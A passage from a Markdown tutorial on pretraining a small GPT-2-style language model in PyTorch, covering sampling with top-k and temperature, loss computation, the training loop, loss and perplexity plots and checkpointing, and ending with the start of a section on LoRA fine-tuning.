        # Shortcut connection for attention block
        shortcut = x
        x = self.norm1(x)
        x = self.att(x)   # Shape [batch_size, num_tokens, emb_size]
        x = self.drop_shortcut(x)
        x = x + shortcut  # Add the original input back

        # Shortcut connection for feed-forward block
        shortcut = x
        x = self.norm2(x)
        x = self.ff(x)
        x = self.drop_shortcut(x)
        x = x + shortcut  # Add the original input back

        return x


class GPTModel(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
        self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
        self.drop_emb = nn.Dropout(cfg["drop_rate"])

        self.trf_blocks = nn.Sequential(
            *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])

        self.final_norm = LayerNorm(cfg["emb_dim"])
        self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)

    def forward(self, in_idx):
        batch_size, seq_len = in_idx.shape
        tok_embeds = self.tok_emb(in_idx)
        pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
        x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
        x = self.drop_emb(x)
        x = self.trf_blocks(x)
        x = self.final_norm(x)
        logits = self.out_head(x)
        return logits
```

</details>

```python
# Download contents to train the data with
import os
import urllib.request

file_path = "the-verdict.txt"
url = "https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt"

if not os.path.exists(file_path):
    with urllib.request.urlopen(url) as response:
        text_data = response.read().decode('utf-8')
    with open(file_path, "w", encoding="utf-8") as file:
        file.write(text_data)
else:
    with open(file_path, "r", encoding="utf-8") as file:
        text_data = file.read()

total_characters = len(text_data)
tokenizer = tiktoken.get_encoding("gpt2")
total_tokens = len(tokenizer.encode(text_data))

print("Data downloaded")
print("Characters:", total_characters)
print("Tokens:", total_tokens)

# Model initialization
GPT_CONFIG_124M = {
    "vocab_size": 50257,   # Vocabulary size
    "context_length": 256, # Shortened context length (orig: 1024)
    "emb_dim": 768,        # Embedding dimension
    "n_heads": 12,         # Number of attention heads
    "n_layers": 12,        # Number of layers
    "drop_rate": 0.1,      # Dropout rate
    "qkv_bias": False      # Query-key-value bias
}

torch.manual_seed(123)
model = GPTModel(GPT_CONFIG_124M)
model.eval()
print ("Model initialized")


# Functions to transform from tokens to ids and from ids to tokens
def text_to_token_ids(text, tokenizer):
    encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
    encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
    return encoded_tensor

def token_ids_to_text(token_ids, tokenizer):
    flat = token_ids.squeeze(0) # remove batch dimension
    return tokenizer.decode(flat.tolist())


# Define loss functions
def calc_loss_batch(input_batch, target_batch, model, device):
    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
    logits = model(input_batch)
    loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
    return loss


def calc_loss_loader(data_loader, model, device, num_batches=None):
    total_loss = 0.
    if len(data_loader) == 0:
        return float("nan")
    elif num_batches is None:
        num_batches = len(data_loader)
    else:
        # Reduce the number of batches to match the total number of batches in the data loader
        # if num_batches exceeds the number of batches in the data loader
        num_batches = min(num_batches, len(data_loader))
    for i, (input_batch, target_batch) in enumerate(data_loader):
        if i < num_batches:
            loss = calc_loss_batch(input_batch, target_batch, model, device)
            total_loss += loss.item()
        else:
            break
    return total_loss / num_batches


# Apply Train/validation ratio and create dataloaders
train_ratio = 0.90
split_idx = int(train_ratio * len(text_data))
train_data = text_data[:split_idx]
val_data = text_data[split_idx:]

torch.manual_seed(123)

train_loader = create_dataloader_v1(
    train_data,
    batch_size=2,
    max_length=GPT_CONFIG_124M["context_length"],
    stride=GPT_CONFIG_124M["context_length"],
    drop_last=True,
    shuffle=True,
    num_workers=0
)

val_loader = create_dataloader_v1(
    val_data,
    batch_size=2,
    max_length=GPT_CONFIG_124M["context_length"],
    stride=GPT_CONFIG_124M["context_length"],
    drop_last=False,
    shuffle=False,
    num_workers=0
)


# Sanity checks
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
    print("Not enough tokens for the training loader. "
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
          "increase the `training_ratio`")

if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
    print("Not enough tokens for the validation loader. "
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
          "decrease the `training_ratio`")

print("Train loader:")
for x, y in train_loader:
    print(x.shape, y.shape)

print("\nValidation loader:")
for x, y in val_loader:
    print(x.shape, y.shape)

train_tokens = 0
for input_batch, target_batch in train_loader:
    train_tokens += input_batch.numel()

val_tokens = 0
for input_batch, target_batch in val_loader:
    val_tokens += input_batch.numel()

print("Training tokens:", train_tokens)
print("Validation tokens:", val_tokens)
print("All tokens:", train_tokens + val_tokens)


# Indicate the device to use
if torch.cuda.is_available():
    device = torch.device("cuda")
elif torch.backends.mps.is_available():
    device = torch.device("mps")
else:
    device = torch.device("cpu")

print(f"Using {device} device.")

model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes


# Pre-calculate losses without starting yet
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader

with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
    train_loss = calc_loss_loader(train_loader, model, device)
    val_loss = calc_loss_loader(val_loader, model, device)

print("Training loss:", train_loss)
print("Validation loss:", val_loss)


# Functions to train the data
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
                       eval_freq, eval_iter, start_context, tokenizer):
    # Initialize lists to track losses and tokens seen
    train_losses, val_losses, track_tokens_seen = [], [], []
    tokens_seen, global_step = 0, -1

    # Main training loop
    for epoch in range(num_epochs):
        model.train()  # Set model to training mode

        for input_batch, target_batch in train_loader:
            optimizer.zero_grad() # Reset loss gradients from previous batch iteration
            loss = calc_loss_batch(input_batch, target_batch, model, device)
            loss.backward() # Calculate loss gradients
            optimizer.step() # Update model weights using loss gradients
            tokens_seen += input_batch.numel()
            global_step += 1

            # Optional evaluation step
            if global_step % eval_freq == 0:
                train_loss, val_loss = evaluate_model(
                    model, train_loader, val_loader, device, eval_iter)
                train_losses.append(train_loss)
                val_losses.append(val_loss)
                track_tokens_seen.append(tokens_seen)
                print(f"Ep {epoch+1} (Step {global_step:06d}): "
                      f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")

        # Print a sample text after each epoch
        generate_and_print_sample(
            model, tokenizer, device, start_context
        )

    return train_losses, val_losses, track_tokens_seen


def evaluate_model(model, train_loader, val_loader, device, eval_iter):
    model.eval()
    with torch.no_grad():
        train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
        val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
    model.train()
    return train_loss, val_loss


def generate_and_print_sample(model, tokenizer, device, start_context):
    model.eval()
    context_size = model.pos_emb.weight.shape[0]
    encoded = text_to_token_ids(start_context, tokenizer).to(device)
    with torch.no_grad():
        token_ids = generate_text(
            model=model, idx=encoded,
            max_new_tokens=50, context_size=context_size
        )
    decoded_text = token_ids_to_text(token_ids, tokenizer)
    print(decoded_text.replace("\n", " "))  # Compact print format
    model.train()


# Start training!
import time
start_time = time.time()

torch.manual_seed(123)
model = GPTModel(GPT_CONFIG_124M)
model.to(device)
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)

num_epochs = 10
train_losses, val_losses, tokens_seen = train_model_simple(
    model, train_loader, val_loader, optimizer, device,
    num_epochs=num_epochs, eval_freq=5, eval_iter=5,
    start_context="Every effort moves you", tokenizer=tokenizer
)

end_time = time.time()
execution_time_minutes = (end_time - start_time) / 60
print(f"Training completed in {execution_time_minutes:.2f} minutes.")


# Show graphics with the training process
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
import math

def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
    fig, ax1 = plt.subplots(figsize=(5, 3))
    ax1.plot(epochs_seen, train_losses, label="Training loss")
    ax1.plot(
        epochs_seen, val_losses, linestyle="-.", label="Validation loss"
    )
    ax1.set_xlabel("Epochs")
    ax1.set_ylabel("Loss")
    ax1.legend(loc="upper right")
    ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
    ax2 = ax1.twiny()
    ax2.plot(tokens_seen, train_losses, alpha=0)
    ax2.set_xlabel("Tokens seen")
    fig.tight_layout()
    plt.show()

    # Compute perplexity from the loss values
    train_ppls = [math.exp(loss) for loss in train_losses]
    val_ppls = [math.exp(loss) for loss in val_losses]
    # Plot perplexity over tokens seen
    plt.figure()
    plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
    plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
    plt.xlabel('Tokens Seen')
    plt.ylabel('Perplexity')
    plt.title('Perplexity over Training')
    plt.legend()
    plt.show()

epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)


torch.save({
    "model_state_dict": model.state_dict(),
    "optimizer_state_dict": optimizer.state_dict(),
    },
"/tmp/model_and_optimizer.pth"
)
```

Let's see an explanation step by step.

### Functions to transform text <--> ids

These are some simple functions that can be used to transform texts from the vocabulary to ids and back. This is needed at the beginning of the handling of the text and at the end of the predictions:

```python
# Functions to transform from tokens to ids and from ids to tokens
def text_to_token_ids(text, tokenizer):
    encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
    encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
    return encoded_tensor

def token_ids_to_text(token_ids, tokenizer):
    flat = token_ids.squeeze(0) # remove batch dimension
    return tokenizer.decode(flat.tolist())
```

### Generate text functions

In a previous section a function was shown that just picked the **most probable token** after getting the logits. However, this means that for each entry the same output is always going to be generated, which makes it very deterministic.

The following `generate_text` function will apply the `top-k`, `temperature` and `multinomial` concepts.

- The **`top-k`** means that we will start reducing to `-inf` all the probabilities of all the tokens except the top k tokens. So, if k=3, before making a decision only the 3 most probable tokens will have a probability different from `-inf`.
- The **`temperature`** means that every logit will be divided by the temperature value. A value of `0.1` will boost the highest probability compared with the lowest one, while a temperature of `5`, for example, will make the distribution flatter. This helps to introduce the variation in responses we would like the LLM to have (see the short sketch after this list).
- After applying the temperature, a **`softmax`** function is applied again to make all the remaining tokens have a total probability of 1.
- Finally, instead of choosing the token with the biggest probability, the function **`multinomial`** is applied to **predict the next token according to the final probabilities**. So if token 1 had 70% probability, token 2 20% and token 3 10%, 70% of the time token 1 will be selected, 20% of the time it will be token 2 and 10% of the time it will be token 3.

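As a minimal sketch of the temperature effect (the toy logits are illustrative, not from the original notebook), note how a low temperature sharpens the distribution while a high one flattens it:

```python
import torch

logits = torch.tensor([2.0, 1.0, 0.1])  # hypothetical raw scores

for temperature in (0.1, 1.0, 5.0):
    probs = torch.softmax(logits / temperature, dim=-1)
    print(temperature, probs)
# T=0.1 -> almost all the mass on the first token (near-greedy)
# T=5.0 -> nearly uniform distribution (more random sampling)
```
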
```python
# Generate text function
def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top_k=None, eos_id=None):

    # For-loop is the same as before: Get logits, and only focus on last time step
    for _ in range(max_new_tokens):
        idx_cond = idx[:, -context_size:]
        with torch.no_grad():
            logits = model(idx_cond)
        logits = logits[:, -1, :]

        # New: Filter logits with top_k sampling
        if top_k is not None:
            # Keep only top_k values
            top_logits, _ = torch.topk(logits, top_k)
            min_val = top_logits[:, -1]
            logits = torch.where(logits < min_val, torch.tensor(float("-inf")).to(logits.device), logits)

        # New: Apply temperature scaling
        if temperature > 0.0:
            logits = logits / temperature

            # Apply softmax to get probabilities
            probs = torch.softmax(logits, dim=-1)  # (batch_size, context_len)

            # Sample from the distribution
            idx_next = torch.multinomial(probs, num_samples=1)  # (batch_size, 1)

        # Otherwise same as before: get idx of the vocab entry with the highest logits value
        else:
            idx_next = torch.argmax(logits, dim=-1, keepdim=True)  # (batch_size, 1)

        if idx_next == eos_id:  # Stop generating early if end-of-sequence token is encountered and eos_id is specified
            break

        # Same as before: append sampled index to the running sequence
        idx = torch.cat((idx, idx_next), dim=1)  # (batch_size, num_tokens+1)

    return idx
```

> [!NOTE]
> There is a common alternative to `top-k` called [**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling), also known as nucleus sampling, which, instead of taking the k samples with the most probability, **sorts** the whole resulting **vocabulary** by probability and **sums** the probabilities from the highest to the lowest until a **threshold is reached**.
>
> Then, **only those words** of the vocabulary will be considered according to their relative probabilities.
>
> This removes the need to select a number `k` of samples, as the optimal k might be different in each case; **only a threshold** is needed.
>
> _Note that this improvement isn't included in the previous code._

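As a hedged sketch of what such a nucleus (top-p) filter could look like for a batch of last-step logits (this helper is illustrative and not part of the original code):

```python
import torch

def top_p_filter(logits, top_p=0.9):
    # Sort token probabilities from highest to lowest
    probs = torch.softmax(logits, dim=-1)
    sorted_probs, sorted_idx = torch.sort(probs, descending=True)
    cumulative = torch.cumsum(sorted_probs, dim=-1)

    # Drop tokens once the cumulative probability (before adding them) exceeds top_p,
    # so the most probable token is always kept
    remove = (cumulative - sorted_probs) > top_p
    sorted_probs[remove] = 0.0

    # Map the filtered probabilities back to the original token order and renormalize
    filtered = torch.zeros_like(probs).scatter(-1, sorted_idx, sorted_probs)
    return filtered / filtered.sum(dim=-1, keepdim=True)

# Possible usage inside the sampling loop:
# probs = top_p_filter(logits[:, -1, :]); idx_next = torch.multinomial(probs, num_samples=1)
```
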
> [!NOTE]
> Another way to improve the generated text is by using **Beam search** instead of the greedy search used in this example.\
> Unlike greedy search, which selects the most probable next word at each step and builds a single sequence, **beam search keeps track of the top k highest-scoring partial sequences** (called "beams") at each step. By exploring multiple possibilities simultaneously, it balances efficiency and quality, increasing the chances of **finding a better overall** sequence that might be missed by the greedy approach due to early, suboptimal choices.
>
> _Note that this improvement isn't included in the previous code._

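A possible sketch of such a beam search on top of the same `model` interface (assuming a batch size of 1; this is illustrative and not part of the original code):

```python
import torch

def generate_beam(model, idx, max_new_tokens, context_size, beam_width=3):
    # Each beam is a tuple (sequence_tensor, cumulative_log_prob); idx has shape (1, n_tokens)
    beams = [(idx, 0.0)]
    for _ in range(max_new_tokens):
        candidates = []
        for seq, score in beams:
            with torch.no_grad():
                logits = model(seq[:, -context_size:])
            log_probs = torch.log_softmax(logits[:, -1, :], dim=-1)  # (1, vocab_size)
            top_log_probs, top_ids = torch.topk(log_probs, beam_width)
            for lp, tok in zip(top_log_probs[0], top_ids[0]):
                new_seq = torch.cat((seq, tok.view(1, 1)), dim=1)
                candidates.append((new_seq, score + lp.item()))
        # Keep only the best `beam_width` partial sequences
        beams = sorted(candidates, key=lambda c: c[1], reverse=True)[:beam_width]
    return beams[0][0]  # best-scoring sequence
```
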
### Loss functions

The **`calc_loss_batch`** function calculates the cross entropy of the prediction of a single batch.\
The **`calc_loss_loader`** gets the cross entropy of all the batches and calculates the **average cross entropy**.

```python
# Define loss functions
def calc_loss_batch(input_batch, target_batch, model, device):
    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
    logits = model(input_batch)
    loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
    return loss

def calc_loss_loader(data_loader, model, device, num_batches=None):
    total_loss = 0.
    if len(data_loader) == 0:
        return float("nan")
    elif num_batches is None:
        num_batches = len(data_loader)
    else:
        # Reduce the number of batches to match the total number of batches in the data loader
        # if num_batches exceeds the number of batches in the data loader
        num_batches = min(num_batches, len(data_loader))
    for i, (input_batch, target_batch) in enumerate(data_loader):
        if i < num_batches:
            loss = calc_loss_batch(input_batch, target_batch, model, device)
            total_loss += loss.item()
        else:
            break
    return total_loss / num_batches
```

> [!NOTE]
> **Gradient clipping** is a technique used to enhance **training stability** in large neural networks by setting a **maximum threshold** for gradient magnitudes. When gradients exceed this predefined `max_norm`, they are scaled down proportionally to ensure that updates to the model's parameters remain within a manageable range, preventing issues like exploding gradients and ensuring more controlled and stable training.
>
> _Note that this improvement isn't included in the previous code._
>
> Check the following example:

<figure><img src="../../images/image (6) (1).png" alt=""><figcaption></figcaption></figure>

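As a minimal sketch of how it would typically be added to a training step like the one in `train_model_simple` (the clipping call goes between `loss.backward()` and `optimizer.step()`; this is not part of the original code):

```python
loss = calc_loss_batch(input_batch, target_batch, model, device)
loss.backward()

# Rescale gradients so their global L2 norm never exceeds max_norm
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0)

optimizer.step()
optimizer.zero_grad()
```
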
### Loading Data

The function `create_dataloader_v1` was already discussed in a previous section.

From here, note how it's defined that 90% of the text is going to be used for training while the remaining 10% will be used for validation, and both sets are stored in 2 different data loaders.\
Note that sometimes part of the data set is also left as a test set to better evaluate the performance of the model.

Both data loaders are using the same batch size, maximum length, stride and number of workers (0 in this case).\
The main differences are the data used by each, and that the validation loader is not dropping the last batch nor shuffling the data, as that's not needed for validation purposes.

Also, the fact that the **stride is as big as the context length** means that there won't be overlapping between the contexts used to train the data (this reduces overfitting but also the size of the training data set).

Moreover, note that the batch size in this case is 2, to divide the data into 2 batches; the main goal of this is to allow parallel processing and reduce the memory consumption per batch.

```python
train_ratio = 0.90
split_idx = int(train_ratio * len(text_data))
train_data = text_data[:split_idx]
val_data = text_data[split_idx:]

torch.manual_seed(123)

train_loader = create_dataloader_v1(
    train_data,
    batch_size=2,
    max_length=GPT_CONFIG_124M["context_length"],
    stride=GPT_CONFIG_124M["context_length"],
    drop_last=True,
    shuffle=True,
    num_workers=0
)

val_loader = create_dataloader_v1(
    val_data,
    batch_size=2,
    max_length=GPT_CONFIG_124M["context_length"],
    stride=GPT_CONFIG_124M["context_length"],
    drop_last=False,
    shuffle=False,
    num_workers=0
)
```

## Sanity Checks

The goal is to check that there are enough tokens for training, that the shapes are the expected ones, and to get some info about the number of tokens used for training and for validation:

```python
# Sanity checks
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
    print("Not enough tokens for the training loader. "
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
          "increase the `training_ratio`")

if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
    print("Not enough tokens for the validation loader. "
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
          "decrease the `training_ratio`")

print("Train loader:")
for x, y in train_loader:
    print(x.shape, y.shape)

print("\nValidation loader:")
for x, y in val_loader:
    print(x.shape, y.shape)

train_tokens = 0
for input_batch, target_batch in train_loader:
    train_tokens += input_batch.numel()

val_tokens = 0
for input_batch, target_batch in val_loader:
    val_tokens += input_batch.numel()

print("Training tokens:", train_tokens)
print("Validation tokens:", val_tokens)
print("All tokens:", train_tokens + val_tokens)
```

### Select device for training & pre calculations

The following code just selects the device to use and calculates a training loss and a validation loss (without having trained anything yet) as a starting point.

```python
# Indicate the device to use

if torch.cuda.is_available():
    device = torch.device("cuda")
elif torch.backends.mps.is_available():
    device = torch.device("mps")
else:
    device = torch.device("cpu")

print(f"Using {device} device.")

model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes

# Pre-calculate losses without starting yet
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader

with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
    train_loss = calc_loss_loader(train_loader, model, device)
    val_loss = calc_loss_loader(val_loader, model, device)

print("Training loss:", train_loss)
print("Validation loss:", val_loss)
```

### Training functions

The function `generate_and_print_sample` will just get a context and generate some tokens in order to get a feeling about how good the model is at that point. This is called by `train_model_simple` at the end of each epoch.

The function `evaluate_model` is called as frequently as indicated to the training function, and it's used to measure the train loss and the validation loss at that point of the model training.

Then the big function `train_model_simple` is the one that actually trains the model. It expects:

- The train data loader (with the data already separated and prepared for training)
- The validation loader
- The **optimizer** to use during training: This is the function that will use the gradients and will update the parameters to reduce the loss. In this case, as you will see, `AdamW` is used, but there are many more.
  - `optimizer.zero_grad()` is called to reset the gradients on each round to not accumulate them.
  - The **`lr`** param is the **learning rate** which determines the **size of the steps** taken during the optimization process when updating the model's parameters. A **smaller** learning rate means the optimizer **makes smaller updates** to the weights, which can lead to more **precise** convergence but might **slow down** training. A **larger** learning rate can speed up training but **risks overshooting** the minimum of the loss function (**jumping over** the point where the loss function is minimized).
  - **Weight Decay** modifies the **Loss Calculation** step by adding an extra term that penalizes large weights. This encourages the optimizer to find solutions with smaller weights, balancing between fitting the data well and keeping the model simple, preventing overfitting in machine learning models by discouraging the model from assigning too much importance to any single feature.
    - Traditional optimizers like SGD with L2 regularization couple weight decay with the gradient of the loss function. However, **AdamW** (a variant of the Adam optimizer) decouples weight decay from the gradient update, leading to more effective regularization.
- The device to use for training
- The number of epochs: Number of times to go over the training data
- The evaluation frequency: The frequency to call `evaluate_model`
- The evaluation iteration: The number of batches to use when evaluating the current state of the model when calling `evaluate_model`
- The start context: The starting sentence to use when calling `generate_and_print_sample`
- The tokenizer

```python
# Functions to train the model
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
                       eval_freq, eval_iter, start_context, tokenizer):
    # Initialize lists to track losses and tokens seen
    train_losses, val_losses, track_tokens_seen = [], [], []
    tokens_seen, global_step = 0, -1

    # Main training loop
    for epoch in range(num_epochs):
        model.train()  # Set model to training mode

        for input_batch, target_batch in train_loader:
            optimizer.zero_grad() # Reset loss gradients from previous batch iteration
            loss = calc_loss_batch(input_batch, target_batch, model, device)
            loss.backward() # Calculate loss gradients
            optimizer.step() # Update model weights using loss gradients
            tokens_seen += input_batch.numel()
            global_step += 1

            # Optional evaluation step
            if global_step % eval_freq == 0:
                train_loss, val_loss = evaluate_model(
                    model, train_loader, val_loader, device, eval_iter)
                train_losses.append(train_loss)
                val_losses.append(val_loss)
                track_tokens_seen.append(tokens_seen)
                print(f"Ep {epoch+1} (Step {global_step:06d}): "
                      f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")

        # Print a sample text after each epoch
        generate_and_print_sample(
            model, tokenizer, device, start_context
        )

    return train_losses, val_losses, track_tokens_seen


def evaluate_model(model, train_loader, val_loader, device, eval_iter):
    model.eval() # Set in eval mode to avoid dropout
    with torch.no_grad():
        train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
        val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
    model.train() # Back to training mode (dropout etc. active again)
    return train_loss, val_loss


def generate_and_print_sample(model, tokenizer, device, start_context):
    model.eval() # Set in eval mode to avoid dropout
    context_size = model.pos_emb.weight.shape[0]
    encoded = text_to_token_ids(start_context, tokenizer).to(device)
    with torch.no_grad():
        token_ids = generate_text(
            model=model, idx=encoded,
            max_new_tokens=50, context_size=context_size
        )
    decoded_text = token_ids_to_text(token_ids, tokenizer)
    print(decoded_text.replace("\n", " "))  # Compact print format
    model.train() # Back to training mode
```

> [!NOTE]
> To improve the learning rate there are a couple of relevant techniques called **linear warmup** and **cosine decay**.
>
> **Linear warmup** consists of defining an initial learning rate and a maximum one, and steadily increasing the learning rate after each update until the maximum is reached. Starting the training with smaller weight updates decreases the risk of the model encountering large, destabilizing updates during its training phase.\
> **Cosine decay** is a technique that **gradually reduces the learning rate** following a half-cosine curve **after the warmup** phase, slowing weight updates to **minimize the risk of overshooting** the loss minima and ensure training stability in later phases.
>
> _Note that these improvements aren't included in the previous code._
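
As a rough, hand-rolled illustration of both techniques (not part of the book's code; all hyperparameter values below are arbitrary assumptions), the learning rate could be computed per step and written into `optimizer.param_groups`:

```python
import math

# Assumed hyperparameters for this sketch
initial_lr = 1e-5   # learning rate at step 0
peak_lr = 4e-4      # maximum learning rate reached right after warmup
min_lr = 1e-6       # floor the cosine decay converges to
warmup_steps = 20   # number of linear-warmup steps
total_steps = 1000  # total number of training steps

def lr_at_step(step: int) -> float:
    if step < warmup_steps:
        # Linear warmup: interpolate from initial_lr up to peak_lr
        return initial_lr + (peak_lr - initial_lr) * step / warmup_steps
    # Cosine decay: half-cosine from peak_lr down to min_lr
    progress = (step - warmup_steps) / max(1, total_steps - warmup_steps)
    return min_lr + (peak_lr - min_lr) * 0.5 * (1 + math.cos(math.pi * progress))

# Inside the training loop, before optimizer.step():
# for param_group in optimizer.param_groups:
#     param_group["lr"] = lr_at_step(global_step)
```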

### Start training

```python
import time
start_time = time.time()

torch.manual_seed(123)
model = GPTModel(GPT_CONFIG_124M)
model.to(device)
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)

num_epochs = 10
train_losses, val_losses, tokens_seen = train_model_simple(
    model, train_loader, val_loader, optimizer, device,
    num_epochs=num_epochs, eval_freq=5, eval_iter=5,
    start_context="Every effort moves you", tokenizer=tokenizer
)

end_time = time.time()
execution_time_minutes = (end_time - start_time) / 60
print(f"Training completed in {execution_time_minutes:.2f} minutes.")
```

### Print training evolution

With the following function it's possible to plot how the training loss, the validation loss and the derived perplexity evolved while the model was being trained.

```python
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
import math

def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
    fig, ax1 = plt.subplots(figsize=(5, 3))
    ax1.plot(epochs_seen, train_losses, label="Training loss")
    ax1.plot(
        epochs_seen, val_losses, linestyle="-.", label="Validation loss"
    )
    ax1.set_xlabel("Epochs")
    ax1.set_ylabel("Loss")
    ax1.legend(loc="upper right")
    ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
    ax2 = ax1.twiny()
    ax2.plot(tokens_seen, train_losses, alpha=0)
    ax2.set_xlabel("Tokens seen")
    fig.tight_layout()
    plt.show()

    # Compute perplexity from the loss values
    train_ppls = [math.exp(loss) for loss in train_losses]
    val_ppls = [math.exp(loss) for loss in val_losses]
    # Plot perplexity over tokens seen
    plt.figure()
    plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
    plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
    plt.xlabel('Tokens Seen')
    plt.ylabel('Perplexity')
    plt.title('Perplexity over Training')
    plt.legend()
    plt.show()


epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
```

### Save the model

It's possible to save the model + optimizer if you want to continue training later:

```python
# Save the model and the optimizer for later training
torch.save({
    "model_state_dict": model.state_dict(),
    "optimizer_state_dict": optimizer.state_dict(),
    },
"/tmp/model_and_optimizer.pth"
)
# Note that this model together with the optimizer occupies close to 2GB

# Restore model and optimizer for training
checkpoint = torch.load("/tmp/model_and_optimizer.pth", map_location=device)

model = GPTModel(GPT_CONFIG_124M)
model.load_state_dict(checkpoint["model_state_dict"])
optimizer = torch.optim.AdamW(model.parameters(), lr=5e-4, weight_decay=0.1)
optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
model.train(); # Put in training mode
```

Or just the model if you are planning to just use it:

```python
# Save the model
torch.save(model.state_dict(), "model.pth")

# Load it
model = GPTModel(GPT_CONFIG_124M)

model.load_state_dict(torch.load("model.pth", map_location=device))

model.eval() # Put in eval mode
```

## Loading GPT2 weights

There are 2 quick scripts to load the GPT2 weights locally. For both you can clone the repository [https://github.com/rasbt/LLMs-from-scratch](https://github.com/rasbt/LLMs-from-scratch) locally, then:

- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py) will download all the weights and transform the formats from OpenAI to the ones expected by our LLM. The script is also prepared with the needed configuration and with the prompt: "Every effort moves you"
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb) allows you to load any of the GPT2 weights locally (just change the `CHOOSE_MODEL` var) and predict text from some prompts. A quick sketch of this approach is shown below.
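
If you only want to sanity-check the published GPT-2 weights (rather than map them into the from-scratch `GPTModel` class), a minimal alternative is to pull them through the `transformers` library. This is a hedched sketch, not the notebook's exact code, and assumes `transformers` and `torch` are installed:

```python
# Minimal sketch: load the published GPT-2 (124M) weights via Hugging Face transformers
# and generate a continuation as a sanity check.
from transformers import GPT2LMHeadModel, GPT2Tokenizer
import torch

tokenizer = GPT2Tokenizer.from_pretrained("gpt2")   # "gpt2" == the 124M checkpoint
model = GPT2LMHeadModel.from_pretrained("gpt2")
model.eval()

input_ids = tokenizer.encode("Every effort moves you", return_tensors="pt")
with torch.no_grad():
    output_ids = model.generate(input_ids, max_new_tokens=25, do_sample=False)
print(tokenizer.decode(output_ids[0]))
```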

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,61 +0,0 @@
# 7.0. LoRA Improvements in fine-tuning

## LoRA Improvements

> [!TIP]
> The use of **LoRA greatly reduces the computation** needed to **fine-tune** already trained models.

LoRA makes it possible to fine-tune **large models** efficiently by only changing a **small part** of the model. It reduces the number of parameters you need to train, saving **memory** and **computational resources**. This is because:

1. **It Reduces the Number of Trainable Parameters**: Instead of updating the entire weight matrix in the model, LoRA **splits** the weight update into two smaller matrices (called **A** and **B**). This makes training **faster** and requires **less memory** because fewer parameters need to be updated.
   1. This is because, instead of computing the complete weight update of a layer (matrix), it approximates it as the product of 2 smaller matrices, reducing the update to compute (see the parameter-count sketch after this list):\

<figure><img src="../../images/image (9) (1).png" alt=""><figcaption></figcaption></figure>

2. **It Keeps the Original Model Weights Unchanged**: LoRA lets you keep the original model weights the same and only updates the **new small matrices** (A and B). This is important because it means the model's original knowledge is preserved, and you only change what is needed.
3. **Efficient Task-Specific Fine-Tuning**: When you want to adapt the model to a **new task**, you can just train the **small LoRA matrices** (A and B) while leaving the rest of the model as it is. This is **much more efficient** than retraining the whole model.
